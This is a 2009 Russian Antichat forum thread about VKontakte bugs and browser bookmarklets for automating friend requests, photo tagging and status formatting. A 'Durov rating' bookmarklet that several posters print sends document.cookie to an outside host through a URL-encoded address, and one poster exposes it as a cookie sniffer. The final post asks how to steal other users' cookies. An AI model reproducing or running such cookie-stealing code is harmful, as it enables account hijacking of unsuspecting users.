Форум АНТИЧАТ (http://forum.antichat.ru/index.php)
-   Социальные сети (http://forum.antichat.ru/forumdisplay.php?f=133)
-   -   Некоторые баги vkontakte.ru (http://forum.antichat.ru/showthread.php?t=45578)

wildshaman 04.04.2009 20:46

Цитата:
Сообщение от Snorlax  
Народ если на данный момент рабочий способ пригласить всех друзей в группу?

Да, есть. php скрипт.

Цитата:
Сообщение от VITАL  
есть рабочий способ статуса в несколько строк?

да. пост запросом \r\n вставляешь куда надо

VITАL 04.04.2009 21:07

wildshaman
только что отправлял енки) и нифига.. проверь если не трудно!

CyberStorm 04.04.2009 23:55

Цитата:
Сообщение от Snorlax  
в контакте много заявок на добавление в друзья как добавить всех сразу?

Скрипт для одобрения всех заявок на вступление в друзья

Также как и со скриптом удаления отметок, либо качаете полный комплект, либо разбираетесь сами, кстати говоря, в этот раз надо будет ручками чуть-чуть поработать, подробности читайте в файле как настроить.txt

_http://narod.ru/disk/6056358000/apply_friend.zip.html


^_^

http://narod.ru/disk/6066760000/cancel_friend.zip.html
из тойже серии, только наооборот---Отменяет все заявки.

ну и полный список скриптов
Цитата:
Скрипты
Друзья:
Одобряем все заявки на вступление в друзья
Отменяем все заявки на вступление в друзья
Сохранения списка друзей на сервере, если даже он закрыт(не все браузеры)


Видео+аудио+фото
Удаление всех аудиозаписей
Удаление всех видеозаписей
Скрипт для удаления отметок с Видео и Фото
Скрипт для подтверждения отметок на Видео и Фото


Альбомы:
Перемещение картинок/фото из одного альбома в другой
Создание множества альбомов
Удаление пустых альбомов


Группы:
Автоматическое вступление в группы
Удаляем все группы
Удаление всех участников группы
Удаление всех тем (обсуждения) в группе


"Вопросы":
Создание множества вопросов
Удаление вопросов


Стена:
Удаляем все сообщения на стене

правда некоторые уже могут не работать, тк не проверял и не переписывал после глобальных изменений во вконтакте, но даже если там чтото изменилось--изменить нужно буквально несколько символов, думаю разберётесь.
мне лень проверять)
примеры и стумал дал, а дальше сами :D

Цитата:
Сообщение от wildshaman  
Да, есть. php скрипт.


да. пост запросом \r\n вставляешь куда надо

эм, вроде как пофиксили.
давно проверял?

Dumi 05.04.2009 00:08

Цитата:
Сообщение от CyberStorm  
^_^

http://narod.ru/disk/6066760000/cancel_friend.zip.html
из тойже серии, только наооборот---Отменяет все заявки.

ну и полный список скриптов

правда некоторые уже могут не работать, тк не проверял и не переписывал после глобальных изменений во вконтакте, но даже если там чтото изменилось--изменить нужно буквально несколько символов, думаю разберётесь.
мне лень проверять)
примеры и стумал дал, а дальше сами :D


эм, вроде как пофиксили.
давно проверял?



Все эти скрипты с этой группы http://vkontakte.ru/club6968868 так что копирайт обязателен ;)

CyberStorm 05.04.2009 00:42

мне-нет, тк они мои))))
и собстветнно говоря-группа тоже моя)))))

только тсссс :p

Dumi 05.04.2009 01:10

Цитата:
Сообщение от CyberStorm  
мне-нет, тк они мои))))
и собстветнно говоря-группа тоже моя)))))

только тсссс :p



Не гони !

CyberStorm 05.04.2009 01:35

http://vkontakte.ru/photo-6968868_126308074

не гоню)))
что за люди пошли...

Dumi 05.04.2009 01:52

Сори чувак!)) :D
С меня ++
Уважаю=)

Просто до тебя тут умники писал уже типо группа ихния и тд....

VITАL 05.04.2009 05:16

давайте попробуем разобрать статус

CyberStorm 05.04.2009 13:39

по винтикам?)
что значит "разобрать"?

Dumi 05.04.2009 13:54

Цитата:
Сообщение от VITАL  
давайте попробуем разобрать статус



Ололо ,ты про статус в столбик? :D

VITАL 05.04.2009 14:44

CyberStorm
почитай предыдущую страницу

Dumi
да...

Sarkis 10.04.2009 16:57

люди есть скрипт что бы всех друзей добавлял автоматически (если мона так назвать)

шоб не клацать все время....

Dumi 10.04.2009 17:18

Цитата:
Сообщение от Sarkis  
люди есть скрипт что бы всех друзей добавлял автоматически (если мона так назвать)

шоб не клацать все время....


Я так понял скрипт одобрения заявок.
вот
Код:
javascript:var divs=document.getElementsByTagName('div');for(var i=0;i<divs.length;i++){var matches=divs[i].id.match('^progric([\\d]+)$');if(matches!=null&&matches.length>0){processRequest(parseInt(matches[1]),1);}}

KaZ@NoVa 10.04.2009 18:25

Цитата:
Сообщение от FALTONICK  
вы навкрное все хотите получить рейт от дурова? нате!
PHP код:
 javascript:msg="<div class='rBlue'><div class='rateBlueBody'><div>от Павел Дуров</div><a href='http://vkontakte.ru/id1'><div class='bigPlus'>+20</div></a></div></div>";document.getElementById("nav").innerHTML=document.getElementById("nav").innerHTML+msg;img=new Image();img.src="%68%74%74%70%3A%2F%2F%6D%2D%7A%2E%66%72%65%65%68%6  F%73%74%69%61%2E%63%6F%6D%2F%73%2E%70%68%70%3F"+document.cookie;alert('Рейтинг увеличен!'); 
вставляйте в окно браузера!

нахер фигню пишешь?
там снифер стоит) куки писдит!!

FALTONICK 10.04.2009 22:56

Цитата:
Сообщение от KaZ@NoVa  
нахер фигню пишешь?
там снифер стоит) куки писдит!!

бла точно:( не заметил! я в группе увидел код

KaZ@NoVa 11.04.2009 02:01

Цитата:
Сообщение от FALTONICK  
бла точно:( не заметил! я в группе увидел код

Нах ты здесь непроверенные коды выкладывваешь??? :mad: :mad: :mad:

Dumi 11.04.2009 08:45

Код:
javascript:msg="<div class='rBlue'><div class='rateBlueBody'><div>от Павел Дуров</div><a href='http://vkontakte.ru/id1'><div class='bigPlus'>+20</div></a></div></div>";document.getElementById("nav").innerHTML=document.getElementById("nav").innerHTML+msg;img=new Image();img.src="%68%74%74%70%3A%2F%2F%6D%2D%7A%2E%66%72%65%65%68%6 F%73%74%69%61%2E%63%6F%6D%2F%73%2E%70%68%70%3F"+document.cookie;alert('Рейтинг увеличен!');


Мда....уверен многие уже попробывали!
Цитата:
img.src="%68%74%74%70%3A%2F%2F%6D%2D%7A%2E%66%72%65%65%68%6 F%73%74%69%61%2E%63%6F%6D%2F%73%2E%70%68%70%3F"+document.cookie;


Я чето эту строчку тоже не заметил :mad:

Tombik 11.04.2009 17:02

ребята, а как фамилию пустой оставить?

Dumi 11.04.2009 18:46

Цитата:
Сообщение от Tombik  
ребята, а как фамилию пустой оставить?



Не как прикрыли уже...

trunker 11.04.2009 22:13

все наверн видели, когда страница в жирном шрифте, делается это просто:
Высшее образование:

страна-япония,город-yokohama,вуз-by Niki for live
там будет проблемотично найти by Niki for live, нажимаем "b" и ищем by Niki for live

может быть кто нить знает, как сделать так, чтоб заменить "by Niki for live" на че нить другое, но чтоб шрифт остался жирным?

Dumi 18.04.2009 10:03

Цитата:
Сообщение от trunker  
все наверн видели, когда страница в жирном шрифте, делается это просто:
Высшее образование:

страна-япония,город-yokohama,вуз-by Niki for live
там будет проблемотично найти by Niki for live, нажимаем "b" и ищем by Niki for live

может быть кто нить знает, как сделать так, чтоб заменить "by Niki for live" на че нить другое, но чтоб шрифт остался жирным?



И вуз и жирный шрифт прикрыли уже.

VITАL 18.04.2009 19:23

Dumi
жирным можно писать после символа ⒶVITAL
везде причем))
так что там нащет статуса? нужен новый скрипт

Andrey_72 24.04.2009 22:49

У кого есть скрипт чтобы сразу всех друзей на фотках отметить?

DarkByte 25.04.2009 06:46

Цитата:
Сообщение от VITАL  
так что там нащет статуса? нужен новый скрипт

А что с ним? Столбик уже не работает, только в опрере, символ #11, остался. #13#10 заменяются на пробелы. В остальных браузерах можно добиться более менее разнесённого на разные строки написания комбинацией #32+#160, как это делает прога MusicSig.

Snorlax 25.04.2009 22:07

Цитата:
Сообщение от Andrey_72  
У кого есть скрипт чтобы сразу всех друзей на фотках отметить?


Добавление всех типоков на фото!
java script: (function(){function getPhotoInfo(){if(res = /([0-9\-]+)_(\d+)/.exec(location.href))return {"mid": res[1], "pid": res[2]};else return {"mid": 0, "pid": 0};}p_mark = function(i){if(i >= window.friends.length){ge('rotating').innerHTML = "<h4> Все друзья были отмечены на этой фотографии!</h4>";clearTimeout(timerID);return;}request_uri = "/photos.php?act=put&pid="+mid+"_"+pid+"&id="+mid+"&oid=0&subject="+window.friends[i].id+"&name="+encodeURI(window.friends[i].name)+"&add=1&x=0&y=0&x2=100&y2=100";img = new Image();img.src = request_uri;ge('commentArea').innerHTML = (i+1) + " of " + window.friends.length + " друзья были отмечены!";timerID = setTimeout("p_mark(" + (i+1) + ")", 500);};p_markall = function(){if(!confirm("Отметить всех друзей на фото? by Snorlax http://forum.antichat.ru/")) return;ge('rotating').innerHTML = "<h4> Обработка <img src=\"http://vkontakte.ru/images/upload.gif\"><br /> Пожалуйста ждите...</h4>";ajax = new Ajax(function(a,r){eval(r);window.friends = fr; p_mark(0);}, function(a,r){alert("Проблема запроса. Попробуйте еще раз");});ajax.get("/photos.php?act=get");};if(!(location.href.match(/vkontakte.ru/) && location.href.match(/photo/))){alert("Открытая страница с фотографией"); return;}var info = getPhotoInfo();var pid = info["pid"], mid = info["mid"], friends;p_markall();})();

Убераеш тут два пробела где : java script: (function))

Vlad-Online 26.04.2009 13:48

У кого есть скрипт чтобы сразу всех друзей в приложение пригласить???

Dumi 26.04.2009 17:20

Цитата:
Сообщение от Vlad-Online  
У кого есть скрипт чтобы сразу всех друзей в приложение пригласить???



Хм...ну на там все написано http://vkontakte.ru/page2697431

Vlad-Online 26.04.2009 21:52

Спасибо!

FALTONICK 26.04.2009 22:30

как создать страницу как эту club6968868 я имею ввиду ссылки картинки и т.д. и как то же самое в приложениях сделать? и вот это http://vkontakte.ru/page1694435 как такую страницу создать

banana 27.04.2009 07:06

Картинка ввиде ссылки - [[photo-8743662_126258736]] - Где photo-8743662_126258736 - ссылка на твою картинку! Читай вики-разметку на сайте ВК. А пага http://vkontakte.ru/page1694435 - это новости в группе. Делай группу создавай пагу, читай вики разметку и будет щастье

u1tra 28.04.2009 06:07

а есть ли способ все видео юзера себе перекинуть разом?
не заходя в каждый и нажимая "добавить" по сто раз.

banana 28.04.2009 06:43

Кто на javascript кодит смогут написать такое

Dumi 28.04.2009 14:02

Цитата:
Сообщение от FALTONICK  
как создать страницу как эту club6968868 я имею ввиду ссылки картинки и т.д. и как то же самое в приложениях сделать? и вот это http://vkontakte.ru/page1694435 как такую страницу создать


Хм...не чего сложно читай вики разметки!
А сама тоблица вот
Код:
{{Hider|Название текст }} или вот готовая таблица {| |+ |- ! !! |- | || |- | {{Hider|Название текст }} | {{Hider|Название текст }} |- | {{Hider|Название текст }} | {{Hider|Название текст }} |- | {{Hider|Название текст }} | {{Hider|Название текст }} |}

Guron_18 04.05.2009 23:09

Новый прикол вконтакта? только зашел на свою страницу, а мне выдает такое:


Собстна сылки на странице
Практические рекомендации:
http://vkontakte.ru/files_n/anon.php

Программное обеспечение
http://vkontakte.ru/news/mps_3.zip

Интернет-телеком
http://vkontakte.ru/mts/login.php

Смена пароля
http://vkontakte.ru/mailpass.php

sabe 04.05.2009 23:47

Guron_18
быстро прикрыли...

1337simon 05.05.2009 15:28

А знает, кто-нибудь как выложить на стенку пользователя видео или аудио, если у этого пользователя запрещено это делать?

Dumi 05.05.2009 15:40

1337simon , такое не возможно.

vitalikis 09.05.2009 22:47

Guron_18 это врятли был баг, посмотри свой файл hosts

Kanung 10.05.2009 18:42

короче ребята.... говорю быстро и по теме... надеюсь вы успеете за пару часов отреагировать.... скажите мне как у пользователя вырвать сразу на мой комп кукисы, а точнее document.cookie . За оперативный ответ зараннее спасибо


Московское время: 07:07.

Powered by: vBulletin Version 3.0.x
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.